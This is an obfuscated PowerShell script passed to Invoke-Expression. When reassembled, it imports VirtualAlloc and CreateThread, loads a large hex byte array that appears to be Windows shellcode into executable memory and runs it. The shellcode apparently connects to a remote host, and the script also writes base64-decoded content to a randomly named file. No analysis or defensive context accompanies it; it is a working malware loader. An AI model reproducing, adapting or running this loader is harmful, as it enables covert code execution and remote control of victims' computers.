InVokE-exPREssion( (("{50}{74}{70}{136}{52}{0}{57}{91}{51}{75}{59}{67}{125}{17}{124}{27}{68}{85}{26}{117}{131}{79}{80}{32}{66}{113}{25}{5}{88}{15}{95}{12}{34}{128}{56}{116}{119}{42}{7}{87}{81}{60}{40}{82}{132}{107}{11}{55}{144}{9}{111}{21}{29}{78}{106}{100}{83}{49}{89}{64}{77}{19}{22}{2}{90}{61}{31}{71}{30}{129}{48}{94}{3}{23}{126}{58}{72}{46}{134}{10}{8}{45}{141}{86}{103}{16}{110}{99}{96}{105}{142}{39}{13}{101}{123}{127}{47}{133}{6}{121}{84}{112}{130}{138}{115}{41}{109}{35}{38}{114}{76}{92}{69}{28}{33}{93}{135}{122}{143}{120}{14}{37}{24}{139}{36}{102}{53}{118}{73}{43}{98}{54}{140}{137}{4}{62}{97}{104}{63}{108}{44}{1}{65}{18}{20}"-f'datory=VoiTrue, Position=0)]
        [string] Voimji','yZsL1w+L1wIzP,0,{1}PUQfbXywvgEaA,{1}VNu','7a,0x69,','+L1wx47,0x65','0x38,0','ress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpTL1w+L',',0x73,0x65,0x64,0x76,0x4f,','14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0L1w+L1','0x4','1c,0x1,0xd3,0L1w+L1wx8b,0x4,0x8b,','5,0x6e,0x6d,','1w49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0','Win32','0x50,0x53',',0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xcd,0xe8,0x4a,0x0','= Add-TL1w+L1wype -memberDef','1w9,0x72,0x2d,0x69,0x46,0x5L1w+L1wa,0x72,0x4f,0x4a,0x5f,','r]122))
    Voifiipdojhcame  = -join',' = vyw;
xqivtj Voiesgidp Voikiao',',0x0,0x0,','fp;

','4,0x5b,0x5','0x4d,0x6f,0x',',0x63,0x6b,0x6f,0x0,0x68','w+L1w,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0L1w+L1wx68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x6','dwStackSize, IntPtr lpStartAdd','0}ker','Get-Random -Count Voiipdojhc etl % {[Char]Voi_})
    return Voifiipdojhcame
}

 &( VoieNV:ComsPEC[4,15,25]-jOINL1wL1w)( ((L1w{1}','0L1w+L1wx68,0x0,0x32,0xe0,0xL1w+L1w84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,','b','3',',0x61,0x2f,L1w+L1w0x35,0L1w+L1wx2e,0x30,0x20,0x28,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,','AllocationType, uint flProtect);
[DllImpo','0xa,0x5f,0x68,0x80,','FunctiL1w+L1wons -passthru

[Byte[]] {1}V',',0x7',',0x0,0x0,0x53,0x56,0x68,0x1',',0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0L1','2,0x63,0x','3,0x52,0x4b,0x66,0x77,0x33,0x72,0x58,0x4a,0x6c,0x36,0x4f,0x68,0x4L1w+L1w9,0x45,0x53,0x67,','x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x5L1','0','b,0x52,0xc,0x8b,0x52,0x','+L1w,0x1,0xc3,','shal]::Copy({1}VNuDs','b','x2f,0x73,0x79,0x4','0x38',',0x2e,0x30,0x3b,0x20,0x72,0x76,0x3a,0x31,0x31,0x2e,','4,0x0,0x68,0x77,0x69,0x6e,0x69,0x54','Vo','ert]::FromBase64String(Voitlcxuk)
','      [Parameter(Man','ff,0xd5,0xL','0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x6L1w+L1wb,0xff,0xff,0xff,',',0x75,0xf6,0x3','0','pak,
        [Paramete','5,0x53,0x53,0x6a,0x3,0x53,','ytes(Voimji','xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0','6c','x2e,0x37,0x32,0x0,0xbb,0xf0,0xb5,0xL','alAlloc(0,[Math]::Max({1}VNuDsyZsIzP.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropSe','0x77','DsyZsIzP.Length)L1w+L1w

{1}JiPzBJdPwKLJx::CreateThread(0,0,{1}PL1w+L1wUQfbXywvgEaA,0,0,0)
L1w)-F[ChAR]34,[ChAR]36) ) 
Voiesgidp','rt({0}kernel32.dl','pak, Voidhgoylb)
}
function vyw() {
    Voiipdojhc = Get-Random -Min 3 -Max 5
    Voiqosyv = ([char[]]([char]9','UWgJuXRqskb = @{0}
[DllImp','L1w+L1w0xd5,0x89,0xc6,0x53,','DUANAAuADUANAAuADEAOAAwAC4ANwA2ACcAL1w;
functio','0x4e,0x54,0x20,0x','0x53,0x68,0x9L1w+L1w0,0x1f,0x0,0x0,0xe8,0x1b,0x1,0x0,0x0,0','xcf,0x8b,0x7L1w','ikiaofp = L1wJwBpAHAAOgAxA','    [IO.File]::WriteAllB','0L1w+L1wx4b,0x52,0x75,0',',0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0L1w+L1wx53,L1w+L1w0x53,0x53,0x53,0xe8,0x3e,0x0',',0x61,0x59,0x5a,0x','tern IL1w+L1wntPtr VirtuL1w+L1walAllocL1w+L1w(IntPtr lpAddress, uint dwSiz','e, uint fl','0xc7,0','w+L1','0x12,L1w+L1w0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x7','x39,0L1w+L1wx7','ort({','w0x51,0x79,0x65,0x52,0x7L1w+L1w7,0x61,0x36,0x4a,0x4b,0x39,0x','wx2,0x2c,0x20,0xc1,0xcf,0xd,0x1,','1whreadId);
{0}@

{1}JiPzBJdPwL1w+L1wKLJx ',',0x68,0x4c,','0x6c,0x','r(Mandatory=VoiTrue, Position=1)]
        [string] Voitlcxuk
    )

    Voidhgoylb = [Conv','x6d,0xL1w+L1w72,0x78,0x57,0xL1w+L1w35,0x4e,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,','0x33,L1w+L1w0L1w+L1wx0,L1w+L1w0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a,0x1f,0x56,0x68,0x75,0xL1w+L1w46,0xL1w+L1','0x30,0xL1w+L1w29,0x20,0x6c,0x69,0xL1w+L1w6b,0x65,0x20,0L1w','inition {1}UWgJuXRqskb -Name {0}Win32{L1w+L1w0} -namespace ',',L1w+L1w0x','1w+L1wa2,0x56,0x6a,0x0,','0x85,0xc','1,0x6a,0x35,0x4L1w+L1w3,0x44',',0xff,0xe0,0x5f,0x5f,0x5a,0x8b,',',0x4e,0x75,0x39L','2,0x96,0x89,0xe2,0x','30,0x54,0x56,0x6b,0x38,0x7L1w+L','0x53,0xff,0xd5


{1}PUQfbXywvgEaA = {1}JiPzBJdPwKLJx::Virtu','6e,0x77,0x70,0x33,','51','+L','rvices.Mar','x42,0x37,0x32,0x68,L1w+L1w0x55,0x33,0x49','0x77,0x5f,0x6a,0x55,0x69,0x49,0x54,0x3','0x1,0xd0,0x89,0x44,0x24,0x2','9,0x','l{0})]
public static extern IntPtr CreateThreadL1w+L1w(IntPtr lpThreadAttributes, uinL1w+L1wt ','L1w+L1w6f,0x35,0x4b,0x66,0x31,0x6b,0x34,0x30,0x52,0x35,0x57,0x30,','x33,0x62,','xc0','ne','1w+L1w85,0L1w+L1wxc0,0x74,0',',0x64,0x8b,0x50,0x30,0x8',',0x13,0x0,0x0,0x68,0x44','0x39,0x7a,0L1w+L1wx4a,0x39,0',',0x53,0x53,0x56,0x68,0x','1w+L1w,0x42,0L',' (Voiqosyv etl ','7..[cha',',0x3a,0x56,0x79,0xa7,0xff,0xd','1w+L1wx32,','L1w+L1wNuDsyZsIzP = 0xfc,0xe8,0x82,0x0L1w+L1w,0x0,0x0,0x60,0x89,L1w+L1w0xe5,0x31,','6,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x37','70,0x','l32.dll{0})]
pL1w+L1wublic staL1w+L1wtic ex','w1,0x8b,0x5L1w+L1w9,0x20,0x1,0xd3,0x8b,0xL1w',',0x33L1w+L1w,0x46,0x58,0x77,0x6e','f,0x38,0x4e,0x4a,0x31,0x72,L1w+L1w0x38,0x36,0x6','w9e,0x86,0xff,0xd5,0x53,0x53','n xqivtj {
    Param(
  ','9,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38L1w+L1w,','44,0x68,0x52,0x56,0x6a,0','8,0x0,0L1w+L1wx20L1w+L1w','0x31,0x3',',0x61,0x5a,0x2L1w+L1wd,L1w+L1','0x2d,0x5','2d,0x6L1w+L1w,0x18,0x7b,0xff,0xd5,L1w+L1w0x85,0xc0,0x75,0x14,0x68,0x88',',0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x5L1w+L1w8,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x')).RepLACE('etl','|').RepLACE(([Char]86+[Char]111+[Char]105),'$').RepLACE(([Char]76+[Char]49+[Char]119),[striNG][Char]39)) 
